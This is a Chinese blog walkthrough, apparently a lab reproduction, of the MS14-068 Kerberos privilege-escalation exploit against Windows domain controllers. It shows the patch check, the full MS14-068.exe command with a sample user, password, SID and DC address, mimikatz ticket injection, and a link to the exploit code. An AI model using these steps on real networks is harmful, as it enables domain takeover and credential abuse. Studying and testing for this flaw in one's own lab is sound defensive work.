内网域渗透之MS14-068复现

在做域渗透测试时,当我们拿到了一个普通域成员的账号后,想继续对该域进行渗透,拿到域控服务器权限。如果域控服务器存在MS14_068漏洞,并且未打补丁,那么我们就可以利用MS14_068快速获得域控服务器权限。

MS14-068编号CVE-2014-6324,补丁为3011780,如果自检可在域控制器上使用命令检测

systeminfo |find "3011780"

如下,为空说明该服务器存在MS14-068漏洞。 

内网域渗透之MS14-068复现_第1张图片

存在如下拓扑图:

域用户hack在域成员主机A上登录过,域成员主机A的管理员通过mimikatz得到了域用户hack的用户名,密码,SID等值,而且域控存在MS14-068漏洞,现在域成员主机A想通过MS14-068漏洞访问域控。

内网域渗透之MS14-068复现_第2张图片

以下命令将生成 [email protected] 票据

MS14-068.exe -u [email protected] -p h123456. -s S-1-5-21-2189311154-2766837956-1982445477-1110 -d 192.168.10.14   
#MS14-068.exe -u 域用户@xie.com -p 域用户密码 -s 域用户SID只 -d 域控ip

内网域渗透之MS14-068复现_第3张图片

在mimikatz中导入票据

kerberos::ptc 票据路径

内网域渗透之MS14-068复现_第4张图片

验证是否成功

内网域渗透之MS14-068复现_第5张图片

注:注入票据时,机器不能是03或xp,因为mimikatz不支持这两个机器注入

本文所用软件:https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068

参考文章:域提权之MS14-068

                 MS14-068域内提权漏洞总结

                 攻防环境之域渗透

你可能感兴趣的:(内网渗透,红蓝对抗)